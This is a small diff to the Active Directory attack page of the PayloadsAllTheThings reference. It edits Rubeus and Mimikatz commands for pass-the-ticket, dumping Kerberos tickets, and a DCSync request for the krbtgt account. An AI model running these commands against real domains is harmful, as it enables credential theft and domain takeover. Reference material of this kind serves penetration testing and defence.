swisskyrepo/PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md

 .\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
 ```

+Alternatively you could also grab the ticket using Mimikatz :  `mimikatz # sekurlsa::tickets`

-Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HACKER\krbtgt`
+Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt`

 #### Mitigation